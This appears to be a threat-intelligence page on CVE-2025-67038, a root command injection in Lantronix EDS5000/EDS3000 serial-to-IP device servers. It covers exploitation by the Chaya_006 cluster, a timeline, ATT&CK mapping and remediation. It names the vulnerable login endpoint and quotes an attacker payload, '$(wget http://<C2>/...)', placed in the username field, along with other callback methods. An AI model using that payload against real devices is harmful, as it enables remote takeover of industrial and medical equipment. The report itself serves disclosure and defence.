Threat reportVulnerabilityTL-2026-1019
CVE-2025-67038: Critical Code Injection in Lantronix EDS5000 Series Under Active Exploitation
CVE-2025-67038 (TL-2026-1019), also tracked as BRIDGE:BREAK (Lantronix EDS5000 component), is a critical-severity software vulnerability scored CVSS 9.8, first published 2026-06-30. It is attributed to Chaya_006 with low confidence, affects Lantronix EDS5000 Series, references 1 CVE (CVE-2025-67038), maps to 18 MITRE ATT&CK techniques (T1046, T1059, T1068), and is covered by 9 detection rules and 35 indicators of compromise.
- CVSS
- 9.8/10Critical
- CVEs
- 1Referenced vulnerabilities
- Techniques
- 18MITRE ATT&CK
- Actors
- 1Chaya_006
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 35Indicators of compromise
Key facts for TL-2026-1019
- Threat ID
- TL-2026-1019
- Also known as
- BRIDGE:BREAK (Lantronix EDS5000 component)
- Severity
- CRITICAL
- CVSS
- 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Status
- ACTIVE
- Category
- VULNERABILITY
- First published
- Last reviewed
- Attribution
- Chaya_006
- Attribution confidence
- LOW
- Motivation
- UNKNOWN
- Target sectors
- industrial control systems, health, manufacturing, critical infrastructure, government administration, utilities, operational technology
- Target regions
- Global, North America, Asia-Pacific
- Detection rules
- 9
- Indicators of compromise
- 35
Malware and tooling in CVE-2025-67038
Malware and tooling: nip.io wildcard DNS
How CVE-2025-67038 works
CISA warns of active exploitation of CVE-2025-67038 (CVSS 9.8), an unauthenticated OS command injection flaw in Lantronix EDS5000/EDS3000 serial-to-IP device servers. The LuCI HTTP JSON-RPC authentication module concatenates the username parameter directly into a shell logging command without sanitization, letting attackers execute arbitrary commands as root via /cgi-bin/luci/rpc/auth. Forescout's Chaya_006 activity cluster has exploited this flaw against honeypots since April 5, 2026, alongside a parallel 4,100+ attempt brute-force campaign; CISA added the CVE to its KEV catalog on June 23, 2026 with a June 26 FCEB remediation deadline.
CVE-2025-67038 is a critical (CVSS 3.1: 9.8) unauthenticated OS command injection vulnerability affecting the Lantronix EDS5000 series (EDS5008, EDS5016, EDS5032) and EDS3000 series (EDS3000PS) serial-to-IP device servers, which are widely deployed to bridge legacy serial equipment (SCADA/ICS controllers, medical devices, building automation systems) to IP networks. The vulnerability resides in the LuCI-derived HTTP JSON-RPC authentication module: when a login attempt to /cgi-bin/luci/rpc/auth fails, the device writes a log entry by concatenating the supplied username directly into a shell command string that is then passed to os.execute() without any input sanitization or escaping. By supplying a username containing shell metacharacters and command substitution syntax (e.g. $(...) or backticks), an unauthenticated remote attacker can execute arbitrary operating system commands with root privileges on the device.
The flaw is one of 22 vulnerabilities disclosed by Forescout Vedere Labs on April 21, 2026 under the umbrella research name BRIDGE:BREAK, which collectively affect Lantronix (8 CVEs across EDS3000PS/EDS5000) and Silex (14 CVEs in the SD330-AC) serial-to-IP converter product lines. BRIDGE:BREAK vulnerability classes span remote code execution (CVE-2026-32955, CVE-2026-32956, CVE-2025-67041), authentication bypass (CVE-2026-32960, CVE-2025-67039), denial-of-service (CVE-2026-32961, CVE-2015-5621), firmware tampering (CVE-2026-32958), arbitrary file upload (CVE-2026-32957), and configuration tampering (CVE-2026-32962, CVE-2026-32964). Forescout demonstrated that chaining these flaws could let an attacker who has already gained a network foothold (e.g. via a compromised industrial router or firewall) pivot through the converter to manipulate sensor readings and actuator behavior in industrial and healthcare OT environments.
Lantronix shipped fixed firmware (2.2.0.0R1 for EDS5000, 3.2.0.0R2 for EDS3000) on February 20, 2026, roughly seven weeks before the CVE was published to NVD on March 11, 2026 and two months before the BRIDGE:BREAK report. Despite the early patch, Forescout observed a threat cluster it tracks as Chaya_006 exploiting CVE-2025-67038 against its honeypots beginning April 5, 2026 — after the patch shipped, suggesting the attackers reverse-engineered the fix (a classic patch-diffing scenario) to construct a working exploit. Chaya_006 traffic used lntxe-prefixed marker strings ($(wget http://<C2>/lntxe1) through lntxea) to fingerprint successful command execution across multiple retrieval methods (wget, busybox wget, curl, Python urllib, raw /dev/tcp sockets, and DNS-based nslookup callbacks to a nip.io wildcard domain), indicating methodical capability testing rather than opportunistic scanning. A second wave on April 6 targeted a related luci_username parameter on other /cgi-bin/luci/ endpoints with both id-command and outbound-callback payloads. In parallel, Forescout tracked a distinct brute-force campaign (Jan 28 - Jun 6, 2026) totaling over 4,100 login attempts across three waves, using four usernames and 200+ password combinations against OpenWRT-derived LuCI credential endpoints, with 'root' as the primary target username.
CISA added CVE-2025-67038 to its Known Exploited Vulnerabilities (KEV) catalog on June 23, 2026, mandating FCEB agency remediation by June 26, 2026 under Binding Operational Directive 26-04. Shodan telemetry cited in coverage identifies roughly 31,850-32,000 internet-exposed OpenWRT LuCI-based devices, of which ~5,000 are believed to be honeypots and ~27,000 are believed to be genuine production systems, underscoring a substantial internet-facing attack surface for an OT-adjacent RCE bug.
MITRE ATT&CK techniques used in TL-2026-1019
Discovery
T1046 Network Service Discovery
Execution
T1059 Command and Scripting Interpreter; T1203 Exploitation for Client Execution
Privilege Escalation
T1068 Exploitation for Privilege Escalation
Command and Control
T1071 Application Layer Protocol; T1105 Ingress Tool Transfer
Initial Access
T1078 Valid Accounts; T1133 External Remote Services; T1190 Exploit Public-Facing Application
Credential Access
T1110 Brute Force; T1552 Unsecured Credentials
Lateral Movement
T1210 Exploitation of Remote Services
Impact
T1499 Endpoint Denial of Service; T1529 System Shutdown/Reboot; T1565 Data Manipulation
Reconnaissance
T1590 Gather Victim Network Information; T1592 Gather Victim Host Information; T1595 Active Scanning
Affected products and versions in CVE-2025-67038
- Lantronix — EDS5000 Series
Vulnerable versions: EDS5008 < 2.2.0.0R1; EDS5016 < 2.2.0.0R1; EDS5032 < 2.2.0.0R1
Fixed in: 2.2.0.0R1 - Lantronix — EDS3000 Series
Vulnerable versions: EDS3000PS < 3.2.0.0R2
Fixed in: 3.2.0.0R2
Remediation for CVE-2025-67038
Patches
- Lantronix EDS5000 firmware 2.2.0.0R1 (released 2026-02-20)
- Lantronix EDS3000 firmware 3.2.0.0R2 (released 2026-02-20)
Immediate actions
- Upgrade Lantronix EDS5000 devices to firmware 2.2.0.0R1 or later
- Upgrade Lantronix EDS3000 devices to firmware 3.2.0.0R2 or later
- Remove internet-facing exposure of the /cgi-bin/luci/rpc/auth and /cgi-bin/luci/ management endpoints
- Block known Chaya_006 and brute-force source IPs at the network perimeter
- Conduct a compromise assessment on any device that received unauthenticated RPC auth requests with shell metacharacters in the username field
Workarounds
- Disable or restrict access to the LuCI HTTP JSON-RPC authentication module if firmware update is not immediately possible
- Place an authenticating reverse proxy or VPN in front of the management interface to block unauthenticated requests
Longer-term hardening
- Segment serial-to-IP converters onto dedicated, firewalled OT/ICS management VLANs with no direct internet routing
- Deploy network-based IDS/IPS signatures for command-injection patterns in HTTP RPC username fields
- Inventory all serial-to-IP bridge devices (Lantronix, Silex, and similar) across the environment and track BRIDGE:BREAK-affected models
- Enforce strong, unique credentials on all LuCI/OpenWRT-derived management interfaces to blunt brute-force campaigns
- Establish a firmware patch-verification and diffing process for OT edge devices to detect patch-derived exploit development
CVEs associated with CVE-2025-67038
Weaknesses (CWE) in CVE-2025-67038
Timeline of CVE-2025-67038
- First wave of a parallel brute-force campaign begins against OpenWRT-derived LuCI credential endpoints, part of a total 4,100+ attempts recorded through June 6.
- Lantronix releases fixed firmware 2.2.0.0R1 (EDS5000) and 3.2.0.0R2 (EDS3000) addressing the RPC command injection flaw, ahead of public CVE disclosure.
- CVE-2025-67038 published to NVD, formally documenting the code injection vulnerability.
- Second brute-force wave (1,943 attempts) runs through April 2, 2026 against OpenWRT LuCI login endpoints.
- Forescout Vedere Labs observes threat cluster Chaya_006 launching 139 HTTP requests from IP 38.207.136.2 (Japan) against honeypots, exploiting CVE-2025-67038 via the /cgi-bin/luci/rpc/auth endpoint with 'lntxe'-prefixed command payloads.
- Chaya_006 conducts a second wave of 67 injection attempts with a modified user-agent, targeting the related luci_username parameter on other /cgi-bin/luci/ endpoints, including id-command and outbound-callback payloads.
- Six follow-up reconnaissance requests observed from the same Chaya_006 infrastructure.
- Forescout publishes the BRIDGE:BREAK technical report, disclosing 22 vulnerabilities (including CVE-2025-67038) across Lantronix and Silex serial-to-IP converters.
- Additional scanner activity observed from 160.238.37.28 (South Korea) and 59.124.166.52 (Taiwan), including proxy authentication header attempts.
- Third brute-force wave (1,849 attempts) runs through May 6, 2026.
- Final brute-force wave (133 attempts) runs through June 6, 2026, closing out the 4,100+ attempt campaign.
- Final documented Chaya_006 exploitation attempt observed, sourced from IP 218.13.42.36 (China), using the user-agent 'openwrt-login-checker/2.0'.
- CISA adds CVE-2025-67038 to the Known Exploited Vulnerabilities catalog, confirming active exploitation and setting a 3-day remediation mandate under BOD 26-04.
- CISA-mandated remediation deadline for Federal Civilian Executive Branch (FCEB) agencies to patch or mitigate CVE-2025-67038.
- The Hacker News publishes coverage of the CISA warning, citing ~31,850 internet-exposed OpenWRT LuCI-based devices identified via Shodan, of which ~5,000 are believed to be honeypots.
Sources cited for CVE-2025-67038
- CISA Warns of Critical Lantronix EDS5000 Vulnerability Under Active Exploitation
- 22 BRIDGE:BREAK Flaws Expose 20,000+ Lantronix and Silex Serial-to-IP Converters
- Analyzing Active Exploitation of Lantronix and OpenWRT LuCI
- Lantronix Serial-to-IP Converter Flaw Exploited in Attacks After OT Threat Warning
- CVE-2025-67038: Lantronix EDS5000 Code Injection Vulnerability (CISA KEV)
- CISA Warns of Active Attacks on Critical Lantronix and Ubiquiti Device Flaws
- CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
- CISA Escalates Warning on Actively Exploited Lantronix Device Vulnerability
- CVE-2025-67038: Lantronix EDS5000 Root RCE Exploited in Wild
- UniFi OS & Lantronix EDS5000 on CISA's KEV list
- U.S. CISA adds Ubiquiti UniFi OS and Lantronix EDS5000 plugin flaws to its Known Exploited Vulnerabilities catalog
- CISA Known Exploited Vulnerabilities Catalog
- Targeting of OpenWrt-derived platforms exposes OT edge gaps
- NVD CVE-2025-67038 Detail
Detection coverage for TL-2026-1019
As of 2026-06-30, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1019 across Splunk SPL, Microsoft KQL and Sigma, covering 35 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.